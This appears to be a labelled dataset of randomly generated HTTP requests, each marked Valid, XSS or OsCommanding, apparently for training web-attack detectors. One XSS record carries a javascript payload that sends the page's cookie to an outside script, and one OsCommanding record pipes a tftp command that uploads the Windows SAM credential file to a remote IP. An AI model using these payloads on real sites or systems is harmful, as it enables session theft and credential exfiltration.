UA-CPU: x86
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5493x774
Via: 2.4 www.lnes.html, 3.5 235.242.200.249:394
Transfer-Encoding: deflate
Upgrade: Inss/4.9, hae/5.8, yoTgu/3.8, aeTdb/0.2
Warning: 918 94.49.114.205 "tstiayw" 
X-Forwarded-For: 89.218.230.173
X-Serial-Number: 074898
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1uONvmum=systeme1ls&jWVo1xmlyselectscript@=yoosdz&hlre3thretnd=tiDtn3nB4irgtnl29w&ghttmgPejsrr0i=65954

End - Id: 4905
Start - Id: 24894
class: Valid
GET /suNsfs4L6ulthtth1mro/rRn4sruua/fy.AuCbaijR/psd2Babin7JgCPAZJ/6Q0/itRFkY19szIKNRr5/oO3w_n-OgUVt/eY/6JH8o9WDhN@.oC/qjBn.php4?C@fg4CG-includeYcopyr=3514 HTTP/1.0
Host: www.9t68Oeeeeu.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 156.60.110.77
Cookie: oihoylextennaSe=3561341858;Irhnetcatf=nph-miiatOav;tr2oeertl=51URlAyT;okxaoenewtt=yWGL;ndta=qSp.6f8C21;fm9iah=212976946
Cookie2: $Version="874"
Date: Sat, 16 Jul 05 14:43:51 GMT
ETag: W/"FxtqU09exwYLETXGjByR"
Expect: 100-continue
From: jetanin0@wfha2rk3x8.biz
If-Modified-Since: Fri, 08 Dec 06 08:12:48 GMT
If-Unmodified-Since: Sat, 11 Nov 06 07:16:48 GMT
If-Match: *
If-None-Match: "54QuxZNLBTnx2ETkAP.Y"
If-Range: *
Max-Forwards: 42
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: ienHsv etaoSe=eieNtmS
Authorization: Digest cnonce="nomg"
Range: 16122-,024603-0,-592
Referer: /eRm7noxe.msf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.6 (X11; U; Unix 2.0; xf-or; rv:1.0.1) Gecko/57646596
UA-CPU: MIPS
UA-Disp: 8792,070,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0163x5496
Via: 5.5 147.55.236.24, 0.6 240.58.156.207, ogyeTt/9.1 www.82yrP.jpeg
Transfer-Encoding: deflate
Upgrade: nEooi/0.2, aBs/4.1, ags/4.8, 91ixu/4.9
Warning: 430 178.33.189.66 "taE90anszeAies" "Thu, 03 Feb 05 22:56:19 CET"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24894
Start - Id: 47219
class: XSS
GET /eAyThNV95d_1Leic52B/eTCRrJEInl-@f0ERL/a.9T__q/culXZrp64moPRnFo9/Bxterm4WX2VHQaKaRLj/eRLRjaLgYkUCcoD/rSZfnTgkJ@8SvX.MnWI_.php4?70aA1ZX=45128&Aryosry6eHsqsq=ys%2Bt&s3ehup9uiinS0i=8912&ciyoorra=FfEuSigeives&v-Bc=6&Xh3kfIFSP=ndg7fftfae&td=hckcM.Q&niaayb9koas=1&ZxmlOpsGO=lWdfe26tntegdetcdiv&srEgh6oyuco8=42496&r7EH_s9GrJu=%3Cimg+++++dynsrc+%3D+++%22++javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.atle.com%2Fcgi-bin%2Fonenrallit.cgi%27%2Bdocument.cookie%29%3B%5D+%22+%3E&7iCbmpasswdVomQb=sK-yk&pi49phdonnw3lAr=ylhturmoeoyriyh136a%28&oHgwrp0yl7ergdn=mmeThosin2s&mPoeaLrsoaeE=oenrz HTTP/1.1
Host: 209.75.143.183
Connection: zledmcb
Accept: application/zip, image/*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: compress, compress;q=0.9, identity;q=0.9, deflate, compress;q=0.5
Accept-Language: sToarreh-oaoqwtci;q=0.7, oe-rrt;q=0.2
Cache-Control: max-age=64203
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Thu, 06 Nov 08 14:12:29 UTC
ETag: "sffq97EglwyE3Ups"
Expect: 100-continue
From: ti73@utlaaob.ch
If-Modified-Since: Tue, 20 May 08 06:42:35 GMT
If-Unmodified-Since: Mon, 14 Sep 09 21:01:00 UTC
If-Match: "5nSQlD5IjUhV1OLAU"
If-None-Match: "ELVoD9mBEzAxs.2pOTs"
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 161
MIME-Version: 6.5
Pragma: 3hlaStsn=ol
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Basic Y2hyTWlyczE6a2lyc3Q=
Range: 4321-2
Referer: /S2Iexq.swf
TE: gzip
Trailer: Referer
User-Agent: reeouhehoridea
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: HTTP/9.7 4.114.234.99, 0.3 214.217.195.236
Transfer-Encoding: gzip
Upgrade: tee/0.1, nRteE6/5.5, eroitr/4.3
Warning: 326 133.104.64.243 "thlBedsxran6eholh" 
X-Forwarded-For: 102.233.207.222
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47219
Start - Id: 14529
class: Valid
GET /2V_6Q8Zj9dK9/esseetwiAfjqyd/nBj9ZTH2rXiF-Jw00h/f7eEHau0/gnecmtnkpgnlesaair/orelozw1V.AhS6e/a8seimifdhpp1oTld6/ewqD3.nsf?miusnjee=345230&4r=1eh7ih1&eT2C5=ewxcu4i.gbl&ehfiHhepute8=aawSer3&cgd=p58%28gcU+A&hIsdeBfhdneq=79466669&ee=%3A&w9Ii=201 HTTP/1.1
Host: www.heammAip.com
Connection: close
Accept: */*
Accept-Charset: cp-950, iso-2022-kr;q=0.5, x-mac-roman;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: lreraxl=pw8egeS
Client-ip: 162.156.75.53
Cookie: iku=51084260;rngs6bet=bttwindow.open;or7wkYs=e\2yvubodyp hel
Cookie2: $Version="1"
Date: Mon, 07 Feb 05 06:10:38 UTC
ETag: "vCcBAqRPR5i-s-_Kr@S"
Expect: dfuOmt=Nehn4
From: vevejh@0Noynt.net
If-Modified-Since: Thu, 21 Jul 05 02:04:24 GMT
If-Unmodified-Since: Mon, 31 May 04 16:36:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9122
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: mpioi pnREumrm=dD4el
Range: 4019-22,-23,269-5
Referer: /3hen4twr/entld/4menr/tejlDgoN.jsp
TE: deflate;q=0.7,gzip
Trailer: If-Range
User-Agent: rnhzx/6.1.5.1
UA-CPU: x86
UA-Disp: 419,862,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3486x145
Via: FTP/6.0 237.166.94.120, HTTP/8.1 www.dgpe.tiff, FTP/6.4 www.1deauejv.jpg
Transfer-Encoding: identity
Upgrade: deoC/9.0, lnte1/6.7
Warning: 202 www.tceh.js "i3meintolnieF2asaend" "Wed, 08 Feb 06 16:32:21 GMT"
X-Forwarded-For: 152.218.118.157
X-Serial-Number: 77346695695851
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14529
Start - Id: 29192
class: Valid
GET /s-_fnjKn_0QK/iuPifGiLom/0sEh9/1TAixsKSHDQ/trJQF@CFW/jOwdRfhttps6J.jsp? HTTP/1.0
Host: www.ogDnu.fr
Connection: close
Accept: text/plain;q=0.9, image/png
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 180.99.51.15
Cookie: Ce=tmsi3cyktheeea;dlthnhHw=nrpacsls;lZIJpeLpslvT=avb7
Cookie2: $Version="391"
Date: Mon, 08 Sep 08 22:00:48 GMT
ETag: "@ZMD3ZRb6Wv2eBkl@wjw"
Expect: xmilS
From: 4otngeu@itoo.net
If-Modified-Since: Wed, 29 Sep 04 20:58:03 UTC
If-Unmodified-Since: Wed, 05 Nov 08 05:14:53 GMT
If-Match: *
If-None-Match: "wudtnydd9k.-9.noS_"
If-Range: "Ba10rpAwzY_peCvO0G"
Max-Forwards: 7814
MIME-Version: 8.2
Pragma: u3GiefaT=eba1dr
Proxy-Authorization: Digest nc=90f0EcDe
Authorization: NTLM YmF0NWNhc25uaTdldGd5Z2hmZWE0b2R0bnZkYW55eWhydWREdnRmWWRvdW9kb2hh
Range: -4
Referer: http://www.taec.biz/sn5nrox/xxTeuYEy/Ptetho.jsp
TE: chunked;q=0.3,trailers
Trailer: Authorization
User-Agent: Mozilla/8.9 (X11; U; Solaris 6.7; ai-lg; rv:3.1.6) Gecko/39740591
UA-CPU: PowerPC
UA-Disp: 0631,129,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 944x565
Via: iobaCo/4.9 www.tuf4s.tiff
Transfer-Encoding: htvsne; tDqwoBrt=rtislii
Upgrade: itc/2.5
Warning: 168 www.escbxam.tiff "8trlaregto" "Sat, 10 Nov 07 11:09:25 UTC"
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 4041973045614
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29192
Start - Id: 32656
class: Valid
POST /aKgSHWwh/WhttpsHKScCpRb-mservices.jpeg? HTTP/1.0
Content-Length: 6
Content-Language: 6k8y9,eoesoSli,awm
Content-Encoding: compress
Content-Location: /iSpdndu/nqixi/a8oif/oOhmue/oDymths.exe
Content-MD5: Ym9Bc0EzdDBwdGhkbHZrbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Oct 07 19:29:23 CET
Last-Modified: Sat, 26 Dec 09 17:14:32 UTC
Host: www.oqwdu.uk:327
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=9
Client-ip: 189.11.42.175
Cookie: bofdgrtiasa=a9v;bcirth8oiHllag=sdhtexpeisplo;tu=i8swltpasswdeo4atewinnt;hh2gl=705114;e9t9y=2RQPH_IzS5;tfhen=eDqo85Fg
Cookie2: $Version="661"
Date: Wed, 25 Mar 09 01:36:01 CET
ETag: W/"7mi5OAs0K0qMM3hK"
Expect: 8ettm2wr
From: t8whu@dszw.biz
If-Modified-Since: Sat, 11 Nov 06 08:12:00 GMT
If-Unmodified-Since: Sat, 12 Jul 08 18:18:41 UTC
If-Match: "WBvLN1-ewnR9mGfk"
If-None-Match: "1bfhF2yW.az17g.WSGj"
If-Range: *
Max-Forwards: 02
MIME-Version: 6.2
Pragma: e='bBscre2'
Proxy-Authorization: Digest cnonce="5slteix"
Authorization: Digest qop=auth-int
Range: 5-,-81662,01479-
Referer: http://www.onb6nr.cz/qyfDrT/attelc.php4
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: s2r-_-9Ep http://www.hcaea.com
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: gtee8a/7.8 176.63.194.172
Transfer-Encoding: gzip
Upgrade: te2awz/6.1, cn0U/1.6
Warning: 166 182.140.231.49 "qo7ntkcIsaeidh7" "Thu, 17 Feb 05 17:04:23 CET"
X-Forwarded-For: 57.135.97.53
X-Serial-Number: 108492
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fu=aiR

End - Id: 32656
Start - Id: 44615
class: OsCommanding
GET /3TSn6Hxlocation7A9/hpleufeuourDz/EtIknnueeoinsddetob.nsf?eoladu9t=rsldr&fEed=90936&ehDewhuiyh=elzisu2&bJVK=usenuu%3Bc4niB6aHpidn%3F&eaeymj7stynnE=ohelrrl&PFDF_BQm9ZZ=9oh8eaAtou3aEnaezG&em=wfTqRWy&eaaooal=1e6Qb6P&ccFHATp%u=212&52FCN=h&eV8%u-DJSNyj=loe0KairgsYlafsr&azeutoef=js0&upoklfllR6=%2Br+nptheSNsOers&ehgsne=14.64.40.60+++%7C+++tftp+++-i+++97.31.174.225+PUT+sam._ HTTP/1.0
Host: 142.253.83.168
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 6dl-RdsKdei;q=0.3, emls-iretn3d, i8ePraa-dizdh;q=0.9, l6e8-4r;q=0.1, tnwfpie-7INbeloo
Cache-Control: min-fresh=79
Client-ip: 187.185.41.118
Cookie: -AQYMis=ieioHnlh;ae=t6diezttk--child;bnet= 
Cookie2: $Version="4"
Date: Tue, 11 Jan 05 01:49:32 GMT
ETag: "_6Y7jSzR68UTRzizu44"
Expect: 100-continue
From: yrtaag@x3hp5xn5i.net
If-Modified-Since: Tue, 19 Jun 07 17:48:55 CET
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 May 05 12:01:31 UTC
Max-Forwards: 7611
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Basic aWVhYmdjdzpvZW9pbGQ=
Range: 6245-9,4665-34,-76
Referer: http://www.haEEoeun.biz/ybkT/alaoratn/L3ofee/ntehhbr.txt
TE: trailers,trailers
Trailer: Host
User-Agent: a2y60sYW http://www.n376y.st
UA-Disp: 0488,6492,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: compress
Upgrade: oTe/6.3, en2/3.5, hq1ltn/9.0, 9elp1/2.1, Esotly/2.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 117.132.107.47
X-Serial-Number: 92326230406152
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44615
Start - Id: 31235
class: Valid
GET /eZOPSI-Lzwqgy/@gMudNEA-m/mnwcedon2Qioem/one0diyewjrtmt/hZqzEJfrag00G9by68L/hX2x@x8C4/7xtExRtdye1ntsnbtcs/faCwY.pl?KAWK0V0bB-=Aebet1Kht1fanUr&ni=tn%40u HTTP/1.0
Host: 174.114.7.106:80
Connection: keep-alive
Accept: audio/basic;q=0.9, audio/x-wav
Accept-Charset: koi8-r, iso-10646-ucs-2;q=0.7, iso-8859-4, iso-8859-2;q=0.4, iso-8859-3
Accept-Encoding: *;q=0.4
Accept-Language: e-fbcH, mDOe-o2enur;q=0.9, MH-racnnh;q=0.9
Cache-Control: max-age=66
Client-ip: 126.82.213.147
Cookie: h48winntfUmecBB=kmGM.oLw;LlGklnidspssst=ynhmayZn
Cookie2: $Version="60"
Date: Tue, 25 Nov 08 07:01:56 CET
ETag: W/"Dmal318zXUTUSlHoY"
Expect: o9osaiuc=ihTezl3i;nc8uNt=wibzeoa
From: DsosoD@ehto0.fr
If-Modified-Since: Thu, 27 Jan 05 22:00:13 CET
If-Unmodified-Since: Sat, 06 Mar 04 09:04:32 UTC
If-Match: *
If-None-Match: "@BFujRif1-0wIq8.avc_"
If-Range: Wed, 11 Apr 07 24:22:00 GMT
Max-Forwards: 6
MIME-Version: 1.4
Pragma: Ir5='f'
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: eD865w hoboicsa=leona
Range: 835058-581
Referer: http://e9Es6mt9.cz/etaf/ava4ixh/f9kyl/iohip7gs/oTmeDk.txt
TE: deflate;q=0.7
Trailer: Proxy-Authorization
User-Agent: otoe (t-VO0aLN; oDFRMqfzk; 3YBO5@zNdS)
UA-CPU: MIPS
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 139x604
Via: 0.9 www.lfszndo.htm:39, 4.7 236.205.175.67
Transfer-Encoding: gzip
Upgrade: pLon/6.3, reyuw3/1.4, erHvaa/9.5, c6T2/3.5
Warning: 470 www.PmqSon.tiff "etyxjzn" "Sat, 18 Jul 09 18:15:29 GMT"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 65900782326
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31235
Start - Id: 997
class: Valid
GET /v3c8z3--DwbBH6W/ntopenIL0nD_Np@.mspx? HTTP/1.1
Host: 74.74.46.81
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.3, euc-cn
Accept-Encoding: *
Accept-Language: nglhcta-Ofgmo, 2odqudm-98Uis2n3;q=0.2, meeiyC-svldt;q=0.4
Cache-Control: max-stale=40
Client-ip: 175.174.118.12
Cookie: ctaaeep=11;welyyG=wmDlaalfa;ouferde=ueqiSidw;sssslwmitn=rttltohef14u;ntt68=tjlma6evalTbic7;ehsl=eiiL
Cookie2: $Version="125"
Date: Wed, 20 Jul 05 08:37:01 UTC
ETag: W/"bqQWfM_fZo4@EVPRM"
Expect: eehrohat=Nerxmte;latten=oEnsnsc
From: iaaeh@rEee.it
If-Modified-Since: Sat, 11 Jul 09 15:23:15 CET
If-Unmodified-Since: Sun, 27 Jan 08 20:03:21 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 01 May 08 21:50:56 UTC
Max-Forwards: 351
MIME-Version: 5.1
Pragma: ssTp2ih='a'
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Basic bk1pN3RhUjp1ZW5D
Range: 726319-,933-
Referer: http://www.Esxt2dg.it/ezse/auniea/3eohlng.avi
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 0.7; no-ns; rv:5.5.2) Gecko/66190130
UA-CPU: MIPS
UA-Disp: 419,762,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 873x994
Via: 1.3 4.29.3.102, 2.8 163.106.118.181:38141
Transfer-Encoding: gzip
Upgrade: sle/6.0, 2ae/5.9
Warning: 561 123.33.248.80 "ohsncetm" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 660527257531
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 997
Start - Id: 3266
class: Valid
GET /.2evbscriptbwindow.openadOL/dt.css?rsefe8sr=0509015231&havhglLhrsny7i=5&Dat6h=808&tph6iefOah=kVd&apvu29i=loeoueaslqeekhb&h8ema=++t93ij&eectioTEta4iojt=%27nk5hA+ey%5Coi%5Bsie&lahftueEbh=i&Qmb09z7objectLW=0257&SDheadzraatlm=48991885&x87=et%3BI&Inu=286e1eHEwDms&ae08e=+ahU%40if&blihllear=eb HTTP/1.0
Host: 245.181.59.223:5102
Connection: keep-alive
Accept: video/quicktime, application/*;q=0.4, video/*;q=0.8
Accept-Charset: iso-8859-4;q=0.2, iso-10646-ucs-2, x-mac-hebrew;q=0.1, x-mac-turkish
Accept-Encoding: identity;q=0.5
Accept-Language: scN-ihI8eico
Cache-Control: only-if-cached
Client-ip: 112.59.59.14
Cookie: entRrfrs=2321930;antrthanlezoanh=Z1Olevee;unoflTfsa6nh7hd=95478855;aotowoyrTeoiEe=53;EelEapuuuaa=eeqlne;draaAor=qr
Cookie2: $Version="585"
Date: Thu, 26 Jan 06 09:50:44 CET
ETag: "cA8DeiXA.XTAXhSt@w-"
Expect: 100-continue
From: traP@tlirhmtniu.ch
If-Modified-Since: Fri, 26 Oct 07 22:25:50 UTC
If-Unmodified-Since: Sat, 13 Mar 04 05:16:36 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 21 Jul 09 22:04:00 UTC
Max-Forwards: 3
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic dGVhWWFpZWE6ZW94MHQ=
Authorization: Digest username="aceaNat"
Range: 61842-5
Referer: http://nohl.biz/flnssmc/h3ntGn1.exe
TE: chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 1.0; st-gu; rv:5.2.2) Gecko/15886261
UA-CPU: PowerPC
UA-Disp: 8523,9540,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 796x812
Via: 0.6 www.6ntq.png, onp/4.7 41.39.198.107
Transfer-Encoding: identity
Upgrade: xftiy/9.7, aNte/0.5, ygm5/4.7, hbosrH/1.6
Warning: 961 www.yt7P.html:06 "d9tetiiwmc" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3266
Start - Id: 20905
class: Valid
GET /dPOqlM0AhWTtTQ/szlfglkIk/ssgyhtebbA/ra1ldntatawtt/inkBVP4bPsOgHU/m@3ZaeocSo7Hbm2_DSsl/tjVySpZ_Z8MfolJPu0p/hTreiewo.php4?EsTHrltJl=ytAVRuUSu&echjiNidSemrs8a=%2Fareplace&4nt=dtvRi99It&nie4een5E=wgetaqaa&nnEosedt=te HTTP/1.1
Host: 235.201.16.49:65585
Connection: eaOLh
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 133.76.119.188
Cookie: tEo=artexec5eIac8l;fXBB=b</sams=zw;Tepl=dcf6d2ojisrye;9child79L25I9i=28
Cookie2: $Version="53"
Date: Mon, 19 Feb 07 02:05:40 CET
ETag: W/"UCpraVfCtd0pS96L4"
Expect: 100-continue
From: iStt7oha@lc2epd8.cz
If-Modified-Since: Tue, 16 Feb 10 14:56:11 UTC
If-Unmodified-Since: Mon, 15 Aug 05 08:52:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 841
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic anZVZXN0aDpYaHpl
Authorization: Basic aHM3c0xzbzpydHRh
Range: 822099-090,811-0
Referer: /pa1dEhal.exe
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: wvRw1T2@9 http://www.aa5etu1.be
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3729x678
Via: 1.3 www.xReioNo.jpg:11774
Transfer-Encoding: compress
Upgrade: neaxe/1.5
Warning: 431 85.173.16.1 "r5mststaned9nnteeeoM" "Sun, 21 Jan 07 21:50:10 GMT"
X-Forwarded-For: 105.130.36.71
X-Serial-Number: 8671982338196
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20905
Start - Id: 29220
class: Valid
GET /bnurW@/ef/07ph2pyibnmodrw/d-rBJU9tctgb4Mds@/mceseyrFenvo/rew7iTy/nEmU4kuiU_Q34c.css?rripmoide=374&fl=59871823&zooo8ed=4610930&hseirows=49874 HTTP/1.0
Host: www.kd4k.com
Connection: keep-alive
Accept: video/quicktime;q=0.2
Accept-Charset: koi8-r, euc-jp, shift_jis, x-mac-hebrew, iso-8859-3;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 213.205.208.65
Cookie: oor=i<0f;rfst=3t;gId=97514;xaveiCigtesoOmz=9966888
Cookie2: $Version="3"
Date: Sun, 06 May 07 10:55:28 GMT
ETag: W/"_79KBLCbMEr9hF_YXqfT"
Expect: 100-continue
From: pfeb@exzls2nagt.biz
If-Modified-Since: Tue, 23 Mar 10 11:04:21 UTC
If-Unmodified-Since: Thu, 01 Sep 05 18:30:12 GMT
If-Match: "UUd.6C-aXcD286CZ3YQ"
If-None-Match: "XDZ@PKLaEkP-v39cJ"
If-Range: "TSLzLypmgf4nghGf8qek"
Max-Forwards: 5
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: NTLM bW9uYXpzdkhvcmxlOWFSZWZwcmllaWt1ZDU0Z2JycnR3
Range: -2
Referer: /Lim3.gz
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: eiteT5ndP8 (a8P19Ag; a43beAc; r1jE2SI-; yH9_fi)
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 200x896
Via: 3.3 192.106.139.231, HTTP/3.3 www.uLm9wbae.shtml
Transfer-Encoding: identity
Upgrade: oqe/8.7, a6n/6.6, wmf/5.2
Warning: 332 146.198.222.127 "sgnyiw" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29220
Start - Id: 9709
class: Valid
GET /amddw3bayrsoeheh/tlkWlfR0tYwI/uuy7N.HXgoX/t1ctyritwa4/KWLmy_WDJJ5Pnpassthru/hIny/ey9HZkzbTUHWSSTf@7cI/_fUP.jpg?UaCL0adnsnjNd=enrt%27Vrmatn6&aeIwmrthdiadn=988012&7Khomedeletez-XCP=sEXFW-CpabaM&fwgbr=0w+nq5tm8yeOmlt%3Ba&hsnrfhhcix=crlikejilTndt6&Ud6pXjxzdform3mail=rtat&8MKQlocation4=2876106429&alrrxaentdOna=nfjge2R HTTP/1.0
Host: 89.1.74.190
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: 9el0-o7loina;q=0.5, bpa-bdf, srnoc-ttc;q=0.4
Cache-Control: max-stale
Client-ip: 193.167.251.53
Cookie: fwlrN1=~slogsfs4pami<?i1g;ise1on=9414137;deUoea=a29su0w.HwnJ;Vtdoja=etl;41y=b8ig
Cookie2: $Version="968"
Date: Sun, 25 Feb 07 22:16:36 UTC
ETag: W/"DJNzeDYWi.q7Ci0JSt"
Expect: 100-continue
From: 6shioi@dci7b.st
If-Modified-Since: Tue, 20 Apr 10 18:58:26 UTC
If-Unmodified-Since: Wed, 01 Dec 04 11:13:26 UTC
If-Match: "6PSnf4BjMSOYrH1B6g"
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic Nk5ZdGV5QU46b2xHczBmcg==
Authorization: Digest qop=safhltiN
Range: 4-,80-5936,42270-
Referer: /E4lap/ajboa/nomoinoo/oiwpeami/efezE.zip
TE: deflate,chunked
Trailer: If-None-Match
User-Agent: Mozilla/0.2 (X11; U; Linux i386 1.8; ps-4r; rv:3.1.3) Gecko/38269240
UA-CPU: x86
UA-Disp: 985,159,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 141x4409
Via: HTTP/4.8 144.252.180.85:41042, 0.0 www.epgc.gif
Transfer-Encoding: deflate
Upgrade: cstd/5.5, tihyI/0.7
Warning: 433 www.ehhrp.gif:2957 "rSrtoo9noa" "Mon, 31 Oct 05 18:45:44 CET"
X-Forwarded-For: 186.223.84.207
X-Serial-Number: 66630290652
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9709
Start - Id: 12629
class: Valid
GET /oMT_ux1RGGPMRS2H/eXRjFh6AjGoA7TsgfZ/nMxYr1I_Knr/ikhqaMdl6u8/emsy4/ePRlbchild/aF/XQex/aChklBMil-ulQYu-yj5.png? HTTP/1.1
Host: www.Ez4uta.org:4599
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, windows-1258;q=0.4
Accept-Encoding: 
Accept-Language: reayke-ewn
Cache-Control: no-cache
Client-ip: 36.193.95.65
Cookie: aLesont=~9teU6T2ai|Tli;babeweg2ch=7959235835;e5sm=oiae;ofh3sRgeg=891917804;toulgoopg84gsn=5165198;hnryQbowdixhqgi=uIvaraer
Cookie2: $Version="5"
Date: Mon, 23 Jun 08 04:04:02 CET
ETag: W/"GKGrunWgwqzVq8o"
Expect: 8mtlG=ls0c8I
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Sun, 13 Dec 09 04:17:58 GMT
If-Unmodified-Since: Sun, 22 Aug 04 03:18:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Aug 06 01:07:08 GMT
Max-Forwards: 69
MIME-Version: 5.5
Pragma: Diesk='cEde3tn'
Proxy-Authorization: NTLM czZpaW90N29vZE80aGlsd3RScElhRGZ2ZWlhM3M2Zk5kc0k4SWQ=
Authorization: os8uv t1bcP4=rzhnxt0
Range: 351-,8925-
Referer: /Lresva/thbiu9/htbha/thaweyo/rpiiHawr.exe
TE: gzip,trailers,trailers
Trailer: If-Match
User-Agent: ceonoamI/5.8
UA-CPU: x86
UA-Disp: 3446,218,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 280x609
Via: 4.6 www.Eitton.gif, wlupdb/0.3 52.19.185.243
Transfer-Encoding: identity
Upgrade: ecc/3.0, uoz/4.6, asr/7.3, iyUor/1.5, ouaiR/5.0
Warning: 783 72.102.250.16 "awreRn4fniopo" 
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 18879
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12629
Start - Id: 8919
class: Valid
GET /pB/trtneiltml2E6ns5tA7t/x2/nrR7aoim3tbaetto8gHo/e29A3GypiyykIP3lQ/dBTPjBpositionrRIL/4fiehmrt/ssai/a5mq5/tybioatosdrntE/.systemP69Q.mspx?ehm4chtOwdi=+tfetcphfrompXe&5aj@N3q5Zr=nhOra-+&espevpnv5GAc0=khrcpd6sluZhttpscoumbb7&_qUaGr=cvdi&FImv.oHHxmail9=7&nete2lan=raZ&i0n=010730&Ni0osc=6tnaeeh&kurmui=n+ncac%3Enhhess++ HTTP/1.0
